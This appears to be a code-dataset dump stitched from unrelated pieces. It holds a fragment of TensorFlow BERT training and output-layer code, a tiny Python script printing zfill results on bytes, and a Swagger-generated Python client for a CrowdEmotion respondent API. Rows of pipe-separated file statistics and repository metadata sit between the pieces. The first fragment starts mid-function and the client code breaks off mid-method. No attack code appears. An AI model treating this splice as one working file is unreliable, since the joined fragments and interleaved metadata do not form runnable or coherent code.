masked_lm_ids = tf.reshape(self.kwargs['masked_lm_ids'], [-1])
masked_lm_weights = tf.reshape(self.kwargs['masked_lm_weights'], [-1])
masked_lm_accuracy = tf.metrics.accuracy(
labels=masked_lm_ids,
predictions=masked_lm_predictions,
weights=masked_lm_weights)
masked_lm_mean_loss = tf.metrics.mean(
values=masked_lm_example_loss, weights=masked_lm_weights)
next_sentence_log_probs = tf.reshape(
next_sentence_log_probs, [-1, next_sentence_log_probs.shape[-1]])
next_sentence_predictions = tf.argmax(
next_sentence_log_probs, axis=-1, output_type=tf.int32)
next_sentence_labels = tf.reshape(self.kwargs['next_sentence_labels'], [-1])
next_sentence_accuracy = tf.metrics.accuracy(
labels=next_sentence_labels, predictions=next_sentence_predictions)
next_sentence_mean_loss = tf.metrics.mean(
values=next_sentence_example_loss)
self.eval_metric = {
"masked_lm_accuracy": masked_lm_accuracy,
"masked_lm_loss": masked_lm_mean_loss,
"next_sentence_accuracy": next_sentence_accuracy,
"next_sentence_loss": next_sentence_mean_loss,
}
def get_masked_lm_output(self, bert_config, input_tensor, output_weights, positions,
label_ids, label_weights):
"""Get loss and log probs for the masked LM."""
input_tensor = gather_indexes(input_tensor, positions)
with tf.variable_scope("cls/predictions"):
# We apply one more non-linear transformation before the output layer.
# This matrix is not used after pre-training.
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=bert_config.hidden_size,
activation=modeling_slice.get_activation(bert_config.hidden_act),
kernel_initializer=modeling_slice.create_initializer(
bert_config.initializer_range))
input_tensor = modeling_slice.layer_norm(input_tensor)
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
output_bias = tf.get_variable(
"output_bias",
shape=[bert_config.vocab_size],
initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
# log_probs = tf.nn.log_softmax(logits, axis=-1)
log_probs = tf.nn.log_softmax(logits)
label_ids = tf.reshape(label_ids, [-1])
label_weights = tf.reshape(label_weights, [-1])
one_hot_labels = tf.one_hot(
label_ids, depth=bert_config.vocab_size, dtype=tf.float32)
# The `positions` tensor might be zero-padded (if the sequence is too
# short to have the maximum number of predictions). The `label_weights`
# tensor has a value of 1.0 for every real prediction and 0.0 for the
# padding predictions.
per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
return (loss, per_example_loss, log_probs)
def get_next_sentence_output(self, bert_config, input_tensor, labels):
"""Get loss and log probs for the next sentence prediction."""
# Simple binary classification. Note that 0 is "next sentence" and 1 is
# "random sentence". This weight matrix is not used after pre-training.
with tf.variable_scope("cls/seq_relationship"):
output_weights = tf.get_variable(
"output_weights",
shape=[2, bert_config.hidden_size],
initializer=modeling_slice.create_initializer(bert_config.initializer_range))
output_bias = tf.get_variable(
"output_bias", shape=[2], initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
# log_probs = tf.nn.log_softmax(logits, axis=-1)
log_probs = tf.nn.log_softmax(logits)
labels = tf.reshape(labels, [-1])
one_hot_labels = tf.one_hot(labels, depth=2, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
loss = tf.reduce_mean(per_example_loss)
return (loss, per_example_loss, log_probs)
def build_output_layer_regression(self):
with tf.variable_scope("src-output-layer"):
self.src_estimation = tf.contrib.layers.fully_connected(
inputs=self.model.get_pooled_output(),
num_outputs=1,
activation_fn=None, #tf.nn.sigmoid
weights_initializer=tf.contrib.layers.xavier_initializer(),
weights_regularizer=tf.contrib.layers.l2_regularizer(scale=1e-3),
biases_initializer=tf.constant_initializer(1e-04),
scope="FC"
)
self.src_prediction = self.src_estimation
self.src_pred_cost = tf.add(
tf.reduce_mean(tf.pow(self.src_prediction - self.labels, 2)),
tf.reduce_sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)),
name="src_cost")
self.loss = self.src_pred_cost
self.logits = self.src_estimation
self.predictions = self.src_prediction
self.accuracy = tf.metrics.accuracy(self.labels, self.predictions)
print('loss', self.loss)
print('logits', self.logits)
print('predictions', self.predictions)
print('accuracy', self.accuracy)
def build_output_layer_classification(self):
with tf.variable_scope("src-output-layer"):
self.src_estimation = tf.contrib.layers.fully_connected(
inputs=self.model.get_pooled_output(),
num_outputs=2,
activation_fn=None,
weights_initializer=tf.contrib.layers.xavier_initializer(),
weights_regularizer=tf.contrib.layers.l2_regularizer(scale=1e-3),
biases_initializer=tf.constant_initializer(1e-04),
scope="FC"
)
self.src_prediction = tf.contrib.layers.softmax(self.src_estimation)[:, 1]
self.src_pred_cost = tf.add(
tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=self.src_estimation, labels=self.labels)),
tf.reduce_sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)),
name="src_cost")
self.loss = self.src_pred_cost
self.logits = self.src_estimation
self.predictions = self.src_prediction
self.accuracy = tf.metrics.accuracy(self.labels, self.predictions)
print('logits', self.logits)
print('predictions', self.predictions)
print('accuracy', self.accuracy)
def build_output_layer_squad(self, is_training=False):
final_hidden = self.model.get_sequence_output()
final_hidden_shape = modeling_slice.get_shape_list(final_hidden, expected_rank=3)
batch_size = final_hidden_shape[0]
seq_length = final_hidden_shape[1]
hidden_size = final_hidden_shape[2]
with tf.variable_scope("cls/squad", reuse=tf.AUTO_REUSE):
output_weights = tf.get_variable(
"output_weights", [2, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"output_bias", [2], initializer=tf.zeros_initializer())
final_hidden_matrix = tf.reshape(final_hidden,
[batch_size * seq_length, hidden_size])
logits = tf.matmul(final_hidden_matrix, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
logits = tf.reshape(logits, [batch_size, seq_length, 2])
logits = tf.transpose(logits, [2, 0, 1])
unstacked_logits = tf.unstack(logits, axis=0)
(start_logits, end_logits) = (unstacked_logits[0], unstacked_logits[1])
# compute loss
seq_length = modeling_slice.get_shape_list(self.input_ids)[1]
def compute_loss(logits, positions):
one_hot_positions = tf.one_hot(
positions, depth=seq_length, dtype=tf.float32)
log_probs = tf.nn.log_softmax(logits)
loss = -tf.reduce_mean(
tf.reduce_sum(one_hot_positions * log_probs, axis=-1))
return loss
def def_loss():
start_positions = self.kwargs["start_positions"]
end_positions = self.kwargs["end_positions"]
start_loss = compute_loss(start_logits, start_positions)
end_loss = compute_loss(end_logits, end_positions)
loss = (start_loss + end_loss) / 2.0
return loss
self.loss = def_loss()
def build_output_layer(self, is_training):
output_layer = self.model.get_pooled_output()
hidden_size = output_layer.shape[-1].value
output_weights = tf.get_variable(
"output_weights", [2, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"output_bias", [2], initializer=tf.zeros_initializer())
print('output_layer', output_layer.shape)
print('output_weights', output_weights.shape)
print('output_bias', output_bias.shape)
with tf.variable_scope("loss"):
if is_training:
# I.e., 0.1 dropout
output_layer = tf.nn.dropout(output_layer, keep_prob=0.9)
logits = tf.matmul(output_layer, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
self.logits = logits
log_probs = tf.nn.log_softmax(self.logits)
print('logits', logits.shape)
one_hot_labels = tf.one_hot(self.labels, depth=2,
dtype=tf.float32)
self.per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
self.loss = tf.reduce_mean(self.per_example_loss)
self.predictions = tf.argmax(self.logits, axis=-1, output_type=tf.int32)
self.accuracy = tf.metrics.accuracy(self.labels, self.predictions)
| 43.339947 | 117 | 0.635648 | 4,005 | 32,765 | 4.897878 | 0.085144 | 0.026101 | 0.008157 | 0.012592 | 0.885808 | 0.871533 | 0.858993 | 0.857157 | 0.857157 | 0.844515 | 0 | 0.010475 | 0.27157 | 32,765 | 755 | 118 | 43.397351 | 0.811413 | 0.078956 | 0 | 0.832452 | 0 | 0 | 0.057486 | 0.002971 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.014109 | 0 | 0.08642 | 0.042328 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1adf9ed69c7aab99d4a8e06e355d660e1f43e607 | 298 | py | Python | 03/03/zfill.py | pylangstudy/201708 | 126b1af96a1d1f57522d5a1d435b58597bea2e57 | [
"CC0-1.0"
] | null | null | null | 03/03/zfill.py | pylangstudy/201708 | 126b1af96a1d1f57522d5a1d435b58597bea2e57 | [
"CC0-1.0"
] | 39 | 2017-07-31T22:54:01.000Z | 2017-08-31T00:19:03.000Z | 03/03/zfill.py | pylangstudy/201708 | 126b1af96a1d1f57522d5a1d435b58597bea2e57 | [
"CC0-1.0"
] | null | null | null | print(b'12'.zfill(8))
print(b'-12'.zfill(8))
print(b'-12.3'.zfill(8))
print(b'+12.3'.zfill(8))
print(b'z12.3x'.zfill(8))
print(bytearray(b'12').zfill(8))
print(bytearray(b'-12').zfill(8))
print(bytearray(b'-12.3').zfill(8))
print(bytearray(b'+12.3').zfill(8))
print(bytearray(b'z12.3x').zfill(8))
| 24.833333 | 36 | 0.654362 | 61 | 298 | 3.196721 | 0.147541 | 0.307692 | 0.507692 | 0.512821 | 1 | 0.917949 | 0.917949 | 0.917949 | 0.805128 | 0.805128 | 0 | 0.125436 | 0.036913 | 298 | 11 | 37 | 27.090909 | 0.554007 | 0 | 0 | 0 | 0 | 0 | 0.14094 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 11 |
1aeed00c1f3e3390988151d2ad63b93e9805fa6e | 34,028 | py | Python | crowdemotion_api_client_python/apis/respondent_api.py | CrowdEmotion/crowdemotion-api-client-python | b5ec57030e36d2b2c32cc5a43b804d7a34401c16 | [
"Apache-2.0"
] | 1 | 2018-06-14T05:12:54.000Z | 2018-06-14T05:12:54.000Z | python/crowdemotion_api_client_python/apis/respondent_api.py | CrowdEmotion/crowdemotion-api-clients-examples | 9e4bd38279399e5694cf3cec6cc7fb0b3149bc39 | [
"MIT"
] | null | null | null | python/crowdemotion_api_client_python/apis/respondent_api.py | CrowdEmotion/crowdemotion-api-clients-examples | 9e4bd38279399e5694cf3cec6cc7fb0b3149bc39 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
CloudEmotion API v1
CrowdEmotion API
OpenAPI spec version: 1.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class RespondentApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def respondent_get(self, research_id, **kwargs):
"""
Find all Respondents of a Research
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_get(research_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int research_id: Search by research id. (required)
:param int skip: The number of results to skip.
:param int limit: The maximum number of results to return.
:param str where: JSON formatted string.
:param str sort: Attribute used to sort results.
:return: list[Respondent]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.respondent_get_with_http_info(research_id, **kwargs)
else:
(data) = self.respondent_get_with_http_info(research_id, **kwargs)
return data
def respondent_get_with_http_info(self, research_id, **kwargs):
"""
Find all Respondents of a Research
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_get_with_http_info(research_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int research_id: Search by research id. (required)
:param int skip: The number of results to skip.
:param int limit: The maximum number of results to return.
:param str where: JSON formatted string.
:param str sort: Attribute used to sort results.
:return: list[Respondent]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['research_id', 'skip', 'limit', 'where', 'sort']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method respondent_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'research_id' is set
if ('research_id' not in params) or (params['research_id'] is None):
raise ValueError("Missing the required parameter `research_id` when calling `respondent_get`")
resource_path = '/respondent'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'research_id' in params:
query_params['research_id'] = params['research_id']
if 'skip' in params:
query_params['skip'] = params['skip']
if 'limit' in params:
query_params['limit'] = params['limit']
if 'where' in params:
query_params['where'] = params['where']
if 'sort' in params:
query_params['sort'] = params['sort']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['api_key']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Respondent]',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def respondent_post(self, body, **kwargs):
"""
Create a Respondent
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_post(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Respondent body: Request body (required)
:return: Respondent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.respondent_post_with_http_info(body, **kwargs)
else:
(data) = self.respondent_post_with_http_info(body, **kwargs)
return data
def respondent_post_with_http_info(self, body, **kwargs):
"""
Create a Respondent
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_post_with_http_info(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Respondent body: Request body (required)
:return: Respondent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method respondent_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `respondent_post`")
resource_path = '/respondent'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['api_key']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Respondent',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def respondent_respondent_id_delete(self, respondent_id, **kwargs):
"""
Delete a Respondent
<p><strong>Permissions:</strong> ✗ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_delete(respondent_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.respondent_respondent_id_delete_with_http_info(respondent_id, **kwargs)
else:
(data) = self.respondent_respondent_id_delete_with_http_info(respondent_id, **kwargs)
return data
def respondent_respondent_id_delete_with_http_info(self, respondent_id, **kwargs):
"""
Delete a Respondent
<p><strong>Permissions:</strong> ✗ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_delete_with_http_info(respondent_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['respondent_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method respondent_respondent_id_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'respondent_id' is set
if ('respondent_id' not in params) or (params['respondent_id'] is None):
raise ValueError("Missing the required parameter `respondent_id` when calling `respondent_respondent_id_delete`")
resource_path = '/respondent/{respondent_id}'.replace('{format}', 'json')
path_params = {}
if 'respondent_id' in params:
path_params['respondent_id'] = params['respondent_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['api_key']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def respondent_respondent_id_get(self, respondent_id, **kwargs):
"""
Find a Respondent
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_get(respondent_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: Search by research id. (required)
:return: Respondent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.respondent_respondent_id_get_with_http_info(respondent_id, **kwargs)
else:
(data) = self.respondent_respondent_id_get_with_http_info(respondent_id, **kwargs)
return data
def respondent_respondent_id_get_with_http_info(self, respondent_id, **kwargs):
"""
Find a Respondent
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_get_with_http_info(respondent_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: Search by research id. (required)
:return: Respondent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['respondent_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method respondent_respondent_id_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'respondent_id' is set
if ('respondent_id' not in params) or (params['respondent_id'] is None):
raise ValueError("Missing the required parameter `respondent_id` when calling `respondent_respondent_id_get`")
resource_path = '/respondent/{respondent_id}'.replace('{format}', 'json')
path_params = {}
if 'respondent_id' in params:
path_params['respondent_id'] = params['respondent_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['api_key']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Respondent',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def respondent_respondent_id_metadata_get(self, respondent_id, **kwargs):
"""
Find Respondent Metadata
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_metadata_get(respondent_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: ID of the Respondent (required)
:return: RespondentMetadataResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.respondent_respondent_id_metadata_get_with_http_info(respondent_id, **kwargs)
else:
(data) = self.respondent_respondent_id_metadata_get_with_http_info(respondent_id, **kwargs)
return data
def respondent_respondent_id_metadata_get_with_http_info(self, respondent_id, **kwargs):
"""
Find Respondent Metadata
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_metadata_get_with_http_info(respondent_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: ID of the Respondent (required)
:return: RespondentMetadataResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['respondent_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method respondent_respondent_id_metadata_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'respondent_id' is set
if ('respondent_id' not in params) or (params['respondent_id'] is None):
raise ValueError("Missing the required parameter `respondent_id` when calling `respondent_respondent_id_metadata_get`")
resource_path = '/respondent/{respondent_id}/metadata'.replace('{format}', 'json')
path_params = {}
if 'respondent_id' in params:
path_params['respondent_id'] = params['respondent_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['api_key']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RespondentMetadataResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def respondent_respondent_id_metadata_post(self, respondent_id, body, **kwargs):
"""
Add Respondent Metadata
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_metadata_post(respondent_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: (required)
:param RespondentMetadata body: Request body (required)
:return: RespondentMetadataResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.respondent_respondent_id_metadata_post_with_http_info(respondent_id, body, **kwargs)
else:
(data) = self.respondent_respondent_id_metadata_post_with_http_info(respondent_id, body, **kwargs)
return data
def respondent_respondent_id_metadata_post_with_http_info(self, respondent_id, body, **kwargs):
"""
Add Respondent Metadata
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_metadata_post_with_http_info(respondent_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: (required)
:param RespondentMetadata body: Request body (required)
:return: RespondentMetadataResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['respondent_id', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method respondent_respondent_id_metadata_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'respondent_id' is set
if ('respondent_id' not in params) or (params['respondent_id'] is None):
raise ValueError("Missing the required parameter `respondent_id` when calling `respondent_respondent_id_metadata_post`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `respondent_respondent_id_metadata_post`")
resource_path = '/respondent/{respondent_id}/metadata'.replace('{format}', 'json')
path_params = {}
if 'respondent_id' in params:
path_params['respondent_id'] = params['respondent_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['api_key']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RespondentMetadataResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def respondent_respondent_id_put(self, respondent_id, body, **kwargs):
"""
Update a Respondent
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_put(respondent_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: (required)
:param Respondent body: Request body (required)
:return: Respondent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.respondent_respondent_id_put_with_http_info(respondent_id, body, **kwargs)
else:
(data) = self.respondent_respondent_id_put_with_http_info(respondent_id, body, **kwargs)
return data
def respondent_respondent_id_put_with_http_info(self, respondent_id, body, **kwargs):
"""
Update a Respondent
<p><strong>Permissions:</strong> ✓ Respondent ✗ Customer ✓ Manager</p>
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.respondent_respondent_id_put_with_http_info(respondent_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int respondent_id: (required)
:param Respondent body: Request body (required)
:return: Respondent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['respondent_id', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method respondent_respondent_id_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'respondent_id' is set
if ('respondent_id' not in params) or (params['respondent_id'] is None):
raise ValueError("Missing the required parameter `respondent_id` when calling `respondent_respondent_id_put`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `respondent_respondent_id_put`")
resource_path = '/respondent/{respondent_id}'.replace('{format}', 'json')
path_params = {}
if 'respondent_id' in params:
path_params['respondent_id'] = params['respondent_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
